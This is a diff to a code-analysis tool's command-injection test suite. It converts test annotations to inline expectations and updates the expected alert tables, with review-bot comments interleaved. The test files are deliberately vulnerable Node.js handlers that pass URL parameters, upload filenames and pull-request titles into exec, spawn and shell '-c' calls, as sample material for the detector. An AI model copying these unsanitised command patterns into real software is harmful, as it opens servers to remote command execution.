child_process-test.js:94:11:94:35 | "ping " ... ms.host | child_process-test.js:94:21:94:30 | ctx.params | child_process-test.js:94:11:94:35 | "ping " ... ms.host | This command line depends on a $@. | child_process-test.js:94:21:94:30 | ctx.params | user-provided value | +| exec-sh2.js:10:12:10:57 | cp.spaw ... ptions) | exec-sh2.js:14:25:14:31 | req.url | exec-sh2.js:10:40:10:46 | command | This command line depends on a $@. | exec-sh2.js:14:25:14:31 | req.url | user-provided value | +| exec-sh.js:15:12:15:61 | cp.spaw ... 
ptions) | exec-sh.js:19:25:19:31 | req.url | exec-sh.js:15:44:15:50 | command | This command line depends on a $@. | exec-sh.js:19:25:19:31 | req.url | user-provided value | +| execSeries.js:14:41:14:47 | command | execSeries.js:18:34:18:40 | req.url | execSeries.js:14:41:14:47 | command | This command line depends on a $@. | execSeries.js:18:34:18:40 | req.url | user-provided value | +| form-parsers.js:9:8:9:39 | "touch ... nalname | form-parsers.js:9:19:9:26 | req.file | form-parsers.js:9:8:9:39 | "touch ... nalname | This command line depends on a $@. | form-parsers.js:9:19:9:26 | req.file | user-provided value | +| form-parsers.js:14:10:14:37 | "touch ... nalname | form-parsers.js:13:3:13:11 | req.files | form-parsers.js:14:10:14:37 | "touch ... nalname | This command line depends on a $@. | form-parsers.js:13:3:13:11 | req.files | user-provided value | +| form-parsers.js:25:10:25:28 | "touch " + filename | form-parsers.js:24:48:24:55 | filename | form-parsers.js:25:10:25:28 | "touch " + filename | This command line depends on a $@. | form-parsers.js:24:48:24:55 | filename | user-provided value | +| form-parsers.js:36:10:36:31 | "touch ... ds.name | form-parsers.js:35:25:35:30 | fields | form-parsers.js:36:10:36:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:35:25:35:30 | fields | user-provided value | +| form-parsers.js:41:10:41:31 | "touch ... ds.name | form-parsers.js:40:26:40:31 | fields | form-parsers.js:41:10:41:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:40:26:40:31 | fields | user-provided value | +| form-parsers.js:53:10:53:31 | "touch ... ds.name | form-parsers.js:52:34:52:39 | fields | form-parsers.js:53:10:53:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:52:34:52:39 | fields | user-provided value | +| form-parsers.js:59:10:59:33 | "touch ... ilename | form-parsers.js:58:30:58:33 | part | form-parsers.js:59:10:59:33 | "touch ... 
ilename | This command line depends on a $@. | form-parsers.js:58:30:58:33 | part | user-provided value | +| other.js:7:33:7:35 | cmd | other.js:5:25:5:31 | req.url | other.js:7:33:7:35 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:8:28:8:30 | cmd | other.js:5:25:5:31 | req.url | other.js:8:28:8:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:9:32:9:34 | cmd | other.js:5:25:5:31 | req.url | other.js:9:32:9:34 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:10:29:10:31 | cmd | other.js:5:25:5:31 | req.url | other.js:10:29:10:31 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:11:29:11:31 | cmd | other.js:5:25:5:31 | req.url | other.js:11:29:11:31 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:12:27:12:29 | cmd | other.js:5:25:5:31 | req.url | other.js:12:27:12:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:14:28:14:30 | cmd | other.js:5:25:5:31 | req.url | other.js:14:28:14:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:15:34:15:36 | cmd | other.js:5:25:5:31 | req.url | other.js:15:34:15:36 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:16:21:16:23 | cmd | other.js:5:25:5:31 | req.url | other.js:16:21:16:23 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:17:27:17:29 | cmd | other.js:5:25:5:31 | req.url | other.js:17:27:17:29 | cmd | This command line depends on a $@. 
| other.js:5:25:5:31 | req.url | user-provided value | +| other.js:18:22:18:24 | cmd | other.js:5:25:5:31 | req.url | other.js:18:22:18:24 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:19:36:19:38 | cmd | other.js:5:25:5:31 | req.url | other.js:19:36:19:38 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:22:21:22:23 | cmd | other.js:5:25:5:31 | req.url | other.js:22:21:22:23 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:23:28:23:30 | cmd | other.js:5:25:5:31 | req.url | other.js:23:28:23:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:26:34:26:36 | cmd | other.js:5:25:5:31 | req.url | other.js:26:34:26:36 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:28:27:28:29 | cmd | other.js:5:25:5:31 | req.url | other.js:28:27:28:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:30:33:30:35 | cmd | other.js:5:25:5:31 | req.url | other.js:30:33:30:35 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:34:44:34:46 | cmd | other.js:5:25:5:31 | req.url | other.js:34:44:34:46 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| third-party-command-injection.js:6:21:6:27 | command | third-party-command-injection.js:5:20:5:26 | command | third-party-command-injection.js:6:21:6:27 | command | This command line depends on a $@. | third-party-command-injection.js:5:20:5:26 | command | user-provided value | edges | actions.js:8:9:8:57 | title | actions.js:9:16:9:20 | title | provenance | | | actions.js:8:17:8:57 | github. ... t.title | actions.js:8:9:8:57 | title | provenance | | 
@@ -209,56 +261,3 @@ nodes | third-party-command-injection.js:5:20:5:26 | command | semmle.label | command | | third-party-command-injection.js:6:21:6:27 | command | semmle.label | command | subpaths -#select -| actions.js:9:8:9:22 | `echo ${title}` | actions.js:8:17:8:57 | github. ... t.title | actions.js:9:8:9:22 | `echo ${title}` | This command line depends on a $@. | actions.js:8:17:8:57 | github. ... t.title | user-provided value | -| actions.js:19:14:19:31 | `echo ${head_ref}` | actions.js:18:20:18:63 | github. ... ead.ref | actions.js:19:14:19:31 | `echo ${head_ref}` | This command line depends on a $@. | actions.js:18:20:18:63 | github. ... ead.ref | user-provided value | -| child_process-test.js:17:13:17:15 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:17:13:17:15 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:18:17:18:19 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:18:17:18:19 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:19:17:19:19 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:19:17:19:19 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:20:21:20:23 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:20:21:20:23 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:21:14:21:16 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:21:14:21:16 | cmd | This command line depends on a $@. 
| child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:22:18:22:20 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:22:18:22:20 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:23:13:23:15 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:23:13:23:15 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:39:5:39:31 | cp.spaw ... cmd ]) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:39:26:39:28 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:44:5:44:34 | cp.exec ... , args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:43:15:43:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:54:5:54:39 | cp.exec ... , args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:53:15:53:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:56:54:56:56 | cmd | This command line depends on a $@. 
| child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:6:15:6:49 | url.par ... ry.path | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:62:5:62:39 | cp.exec ... , args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:53:15:53:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:48:15:48:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:66:19:66:22 | args | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:75:29:75:31 | cmd | child_process-test.js:73:25:73:31 | req.url | child_process-test.js:75:29:75:31 | cmd | This command line depends on a $@. | child_process-test.js:73:25:73:31 | req.url | user-provided value | -| child_process-test.js:83:19:83:36 | req.query.fileName | child_process-test.js:83:19:83:36 | req.query.fileName | child_process-test.js:83:19:83:36 | req.query.fileName | This command line depends on a $@. | child_process-test.js:83:19:83:36 | req.query.fileName | user-provided value | -| child_process-test.js:94:11:94:35 | "ping " ... 
ms.host | child_process-test.js:94:21:94:30 | ctx.params | child_process-test.js:94:11:94:35 | "ping " ... ms.host | This command line depends on a $@. | child_process-test.js:94:21:94:30 | ctx.params | user-provided value | -| exec-sh2.js:10:12:10:57 | cp.spaw ... ptions) | exec-sh2.js:14:25:14:31 | req.url | exec-sh2.js:10:40:10:46 | command | This command line depends on a $@. | exec-sh2.js:14:25:14:31 | req.url | user-provided value | -| exec-sh.js:15:12:15:61 | cp.spaw ... ptions) | exec-sh.js:19:25:19:31 | req.url | exec-sh.js:15:44:15:50 | command | This command line depends on a $@. | exec-sh.js:19:25:19:31 | req.url | user-provided value | -| execSeries.js:14:41:14:47 | command | execSeries.js:18:34:18:40 | req.url | execSeries.js:14:41:14:47 | command | This command line depends on a $@. | execSeries.js:18:34:18:40 | req.url | user-provided value | -| form-parsers.js:9:8:9:39 | "touch ... nalname | form-parsers.js:9:19:9:26 | req.file | form-parsers.js:9:8:9:39 | "touch ... nalname | This command line depends on a $@. | form-parsers.js:9:19:9:26 | req.file | user-provided value | -| form-parsers.js:14:10:14:37 | "touch ... nalname | form-parsers.js:13:3:13:11 | req.files | form-parsers.js:14:10:14:37 | "touch ... nalname | This command line depends on a $@. | form-parsers.js:13:3:13:11 | req.files | user-provided value | -| form-parsers.js:25:10:25:28 | "touch " + filename | form-parsers.js:24:48:24:55 | filename | form-parsers.js:25:10:25:28 | "touch " + filename | This command line depends on a $@. | form-parsers.js:24:48:24:55 | filename | user-provided value | -| form-parsers.js:36:10:36:31 | "touch ... ds.name | form-parsers.js:35:25:35:30 | fields | form-parsers.js:36:10:36:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:35:25:35:30 | fields | user-provided value | -| form-parsers.js:41:10:41:31 | "touch ... ds.name | form-parsers.js:40:26:40:31 | fields | form-parsers.js:41:10:41:31 | "touch ... 
ds.name | This command line depends on a $@. | form-parsers.js:40:26:40:31 | fields | user-provided value | -| form-parsers.js:53:10:53:31 | "touch ... ds.name | form-parsers.js:52:34:52:39 | fields | form-parsers.js:53:10:53:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:52:34:52:39 | fields | user-provided value | -| form-parsers.js:59:10:59:33 | "touch ... ilename | form-parsers.js:58:30:58:33 | part | form-parsers.js:59:10:59:33 | "touch ... ilename | This command line depends on a $@. | form-parsers.js:58:30:58:33 | part | user-provided value | -| other.js:7:33:7:35 | cmd | other.js:5:25:5:31 | req.url | other.js:7:33:7:35 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:8:28:8:30 | cmd | other.js:5:25:5:31 | req.url | other.js:8:28:8:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:9:32:9:34 | cmd | other.js:5:25:5:31 | req.url | other.js:9:32:9:34 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:10:29:10:31 | cmd | other.js:5:25:5:31 | req.url | other.js:10:29:10:31 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:11:29:11:31 | cmd | other.js:5:25:5:31 | req.url | other.js:11:29:11:31 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:12:27:12:29 | cmd | other.js:5:25:5:31 | req.url | other.js:12:27:12:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:14:28:14:30 | cmd | other.js:5:25:5:31 | req.url | other.js:14:28:14:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:15:34:15:36 | cmd | other.js:5:25:5:31 | req.url | other.js:15:34:15:36 | cmd | This command line depends on a $@. 
| other.js:5:25:5:31 | req.url | user-provided value | -| other.js:16:21:16:23 | cmd | other.js:5:25:5:31 | req.url | other.js:16:21:16:23 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:17:27:17:29 | cmd | other.js:5:25:5:31 | req.url | other.js:17:27:17:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:18:22:18:24 | cmd | other.js:5:25:5:31 | req.url | other.js:18:22:18:24 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:19:36:19:38 | cmd | other.js:5:25:5:31 | req.url | other.js:19:36:19:38 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:22:21:22:23 | cmd | other.js:5:25:5:31 | req.url | other.js:22:21:22:23 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:23:28:23:30 | cmd | other.js:5:25:5:31 | req.url | other.js:23:28:23:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:26:34:26:36 | cmd | other.js:5:25:5:31 | req.url | other.js:26:34:26:36 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:28:27:28:29 | cmd | other.js:5:25:5:31 | req.url | other.js:28:27:28:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:30:33:30:35 | cmd | other.js:5:25:5:31 | req.url | other.js:30:33:30:35 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:34:44:34:46 | cmd | other.js:5:25:5:31 | req.url | other.js:34:44:34:46 | cmd | This command line depends on a $@. 
| other.js:5:25:5:31 | req.url | user-provided value | -| third-party-command-injection.js:6:21:6:27 | command | third-party-command-injection.js:5:20:5:26 | command | third-party-command-injection.js:6:21:6:27 | command | This command line depends on a $@. | third-party-command-injection.js:5:20:5:26 | command | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.qlref index f4c8654cda8a..8d677af35712 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.qlref @@ -1 +1,2 @@ -Security/CWE-078/CommandInjection.ql \ No newline at end of file +query: Security/CWE-078/CommandInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js index 1cfea0118bc2..ebc765667a85 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js @@ -5,8 +5,8 @@ const { exec } = require('child_process'); // function to echo title function echo_title() { // get the title from the event pull request - const title = github.context.payload.pull_request.title; - exec(`echo ${title}`, (err, stdout, stderr) => { // NOT OK + const title = github.context.payload.pull_request.title; // $ Source + exec(`echo ${title}`, (err, stdout, stderr) => { // $ Alert if (err) { return; } 
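Review bot: This `.qlref` moves only the CommandInjection query to inline expectations, while the `Consistency.ql` deleted later in the same commit imported five command-injection configurations (CommandInjection, IndirectCommandInjection, ShellCommandInjectionFromEnvironment, UnsafeShellCommandConstruction, SecondOrderCommandInjection) and also checked `UselessCat` alerts. In the part of the diff visible here, no other `.qlref` gains the `postprocess: utils/test/InlineExpectationsTestQuery.ql` line. It is worth confirming that each of the other test directories gets the same two-line form, `query: <path to query>.ql` followed by that `postprocess:` line. Without it, the `$ Alert` / `$ Source` comments in those directories would presumably no longer be checked against the query output, and a regression that drops an alert could pass unnoticed.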
@@ -15,8 +15,8 @@ function echo_title() { // function which passes the issue title into an exec function exec_head_ref() { - const head_ref = github.context.payload.pull_request.head.ref; - aexec.exec(`echo ${head_ref}`).then((res) => { // NOT OK + const head_ref = github.context.payload.pull_request.head.ref; // $ Source + aexec.exec(`echo ${head_ref}`).then((res) => { // $ Alert console.log(res); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js index abc9704a48e8..d11d97fc1c35 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js 
@@ -3,76 +3,76 @@ var cp = require("child_process"), url = require('url'); var server = http.createServer(function(req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Sink Source - cp.exec("foo"); // OK - cp.execSync("foo"); // OK - cp.execFile("foo"); // OK - cp.execFileSync("foo"); // OK - cp.spawn("foo"); // OK - cp.spawnSync("foo"); // OK - cp.fork("foo"); // OK + cp.exec("foo"); + cp.execSync("foo"); + cp.execFile("foo"); + cp.execFileSync("foo"); + cp.spawn("foo"); + cp.spawnSync("foo"); + cp.fork("foo"); - cp.exec(cmd); // NOT OK - cp.execSync(cmd); // NOT OK - cp.execFile(cmd); // NOT OK - cp.execFileSync(cmd); // NOT OK - cp.spawn(cmd); // NOT OK - cp.spawnSync(cmd); // NOT OK - cp.fork(cmd); // NOT OK + cp.exec(cmd); // $ Alert + cp.execSync(cmd); // $ Alert + cp.execFile(cmd); // $ Alert + cp.execFileSync(cmd); // $ Alert + cp.spawn(cmd); // $ Alert + cp.spawnSync(cmd); // $ Alert + cp.fork(cmd); // $ Alert - cp.exec("foo" + cmd + "bar"); // NOT OK + cp.exec("foo" + cmd + "bar"); // $ Alert // These are technically NOT OK, but they are more likely as false positives - cp.exec("foo", {shell: cmd}); // OK - cp.exec("foo", {env: {PATH: cmd}}); // OK - cp.exec("foo", {cwd: cmd}); // OK - cp.exec("foo", {uid: cmd}); // OK - cp.exec("foo", {gid: cmd}); // OK + cp.exec("foo", {shell: cmd}); + cp.exec("foo", {env: {PATH: cmd}}); + cp.exec("foo", {cwd: cmd}); + cp.exec("foo", {uid: cmd}); + cp.exec("foo", {gid: cmd}); let sh, flag; if (process.platform == 'win32') sh = 'cmd.exe', flag = '/c'; else sh = '/bin/sh', flag = '-c'; - cp.spawn(sh, [ flag, cmd ]); // NOT OK + cp.spawn(sh, [ flag, cmd ]); // $ Alert Sink let args = []; args[0] = "-c"; - args[1] = cmd; // NOT OK - cp.execFile("/bin/bash", args); + args[1] = cmd; // $ Sink + cp.execFile("/bin/bash", args); // $ Alert - let args = []; + args = []; args[0] = "-c"; - args[1] = cmd; // NOT OK + args[1] = cmd; // $ Sink run("sh", args); - let args = 
[]; + args = []; args[0] = `-` + "c"; - args[1] = cmd; // NOT OK - cp.execFile(`/bin` + "/bash", args); + args[1] = cmd; // $ Sink + cp.execFile(`/bin` + "/bash", args); // $ Alert - cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // NOT OK - cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // NOT OK + cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert Sink + cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert Sink - let myArgs = []; + let myArgs = []; myArgs.push(`-` + "c"); myArgs.push(cmd); - cp.execFile(`/bin` + "/bash", args); // NOT OK - but no support for `[].push()` for indirect arguments [INCONSISTENCY] + cp.execFile(`/bin` + "/bash", myArgs); // $ MISSING: Alert - no support for `[].push()` for indirect arguments }); -function run(cmd, args) { - cp.spawn(cmd, args); // OK - the alert happens where `args` is build. +function run(cmd, args) { // $ Sink + cp.spawn(cmd, args); // $ Alert - but note that the sink is where `args` is build. } var util = require("util") http.createServer(function(req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source - util.promisify(cp.exec)(cmd); // NOT OK + util.promisify(cp.exec)(cmd); // $ Alert }); @@ -80,7 +80,7 @@ const webpackDevServer = require('webpack-dev-server'); new webpackDevServer(compiler, { before: function (app) { app.use(function (req, res, next) { - cp.exec(req.query.fileName); // NOT OK + cp.exec(req.query.fileName); // $ Alert require("my-sub-lib").foo(req.query.fileName); // calls lib/subLib/index.js#foo }); @@ -91,5 +91,5 @@ import Router from "koa-router"; const router = new Router(); router.get("/ping/:host", async (ctx) => { - cp.exec("ping " + ctx.params.host); // NOT OK -}); \ No newline at end of file + cp.exec("ping " + ctx.params.host); // $ Alert +}); 
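Review bot: The five calls under `// These are technically NOT OK, but they are more likely as false positives` lose their `// OK` markers and now carry no annotation, which the inline-expectations postprocess treats as "no alert expected here". That leaves the old sentence as the only record that a request-controlled `shell`, `env.PATH`, `cwd`, `uid` or `gid` option is deliberately left unreported, and its wording is easy to misread as a pending fix. I would reword it to `// Not flagged by design: a tainted shell/env/cwd/uid/gid option is a real risk, but alerts here are expected to be mostly false positives`. In the same hunk, the comment on `cp.spawn(cmd, args)` inside `run` ends with "is build" and should read "is built". The enclosing `http.createServer` callback starts in the hunk, but the `require` lines above it are outside.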
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js index b5b8fc602bdf..9e59ff90b140 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js @@ -12,10 +12,10 @@ function getShell() { function execSh(command, options) { var shell = getShell() - return cp.spawn(shell.cmd, [shell.arg, command], options) // BAD + return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert Sink } http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source execSh(cmd); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js index ad91b66f5344..5b6d770a2653 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js @@ -7,10 +7,10 @@ function getShell() { } function execSh(command, options) { - return cp.spawn(getShell(), ["-c", command], options) // BAD + return cp.spawn(getShell(), ["-c", command], options) // $ Alert Sink }; http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source execSh(cmd); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js index 25e45d675d9f..45f3e25a8971 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js 
@@ -11,10 +11,10 @@ function asyncEach(arr, iterator) { } function execEach(commands) { - asyncEach(commands, (command) => exec(command)); // NOT OK + asyncEach(commands, (command) => exec(command)); // $ Alert }; require('http').createServer(function(req, res) { - let cmd = require('url').parse(req.url, true).query.path; + let cmd = require('url').parse(req.url, true).query.path; // $ Source execEach([cmd]); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js index 4b1dabde4412..22ca9745c101 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js @@ -6,12 +6,12 @@ var app = express(); var exec = require("child_process").exec; app.post('/profile', upload.single('avatar'), function (req, res, next) { - exec("touch " + req.file.originalname); // NOT OK + exec("touch " + req.file.originalname); // $ Alert }); app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) { - req.files.forEach(file => { - exec("touch " + file.originalname); // NOT OK + req.files.forEach(file => { // $ Source + exec("touch " + file.originalname); // $ Alert }) }); @@ -21,8 +21,8 @@ var Busboy = require('busboy'); http.createServer(function (req, res) { var busboy = new Busboy({ headers: req.headers }); - busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { - exec("touch " + filename); // NOT OK + busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { // $ Source + exec("touch " + filename); // $ Alert }); req.pipe(busboy); }).listen(8000); 
@@ -32,13 +32,13 @@ const formidable = require('formidable'); app.post('/api/upload', (req, res, next) => { let form = formidable({ multiples: true }); - form.parse(req, (err, fields, files) => { - exec("touch " + fields.name); // NOT OK + form.parse(req, (err, fields, files) => { // $ Source + exec("touch " + fields.name); // $ Alert }); let form2 = new formidable.IncomingForm(); - form2.parse(req, (err, fields, files) => { - exec("touch " + fields.name); // NOT OK + form2.parse(req, (err, fields, files) => { // $ Source + exec("touch " + fields.name); // $ Alert }); }); @@ -49,14 +49,14 @@ http.createServer(function (req, res) { // parse a file upload var form = new multiparty.Form(); - form.parse(req, function (err, fields, files) { - exec("touch " + fields.name); // NOT OK + form.parse(req, function (err, fields, files) { // $ Source + exec("touch " + fields.name); // $ Alert }); var form2 = new multiparty.Form(); - form2.on('part', function (part) { // / file / field - exec("touch " + part.filename); // NOT OK + form2.on('part', function (part) { // $ Source - / file / field + exec("touch " + part.filename); // $ Alert }); form2.parse(req); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js index 2e86ace433ce..d4d4b36b674f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js 
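Review bot: In the `@@ -49,14 +49,14 @@` hunk, the annotation on `form2.on('part', function (part) {` now reads `// $ Source - / file / field`, where the trailing `/ file / field` is the remains of the old free-text comment and no longer reads as a sentence. The other annotated lines in this commit use the `$ Tag - explanation` shape, so I would write it as `// $ Source - part is either a file or a field`, assuming that is what the original comment meant. The surrounding `http.createServer` callback begins outside this hunk.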
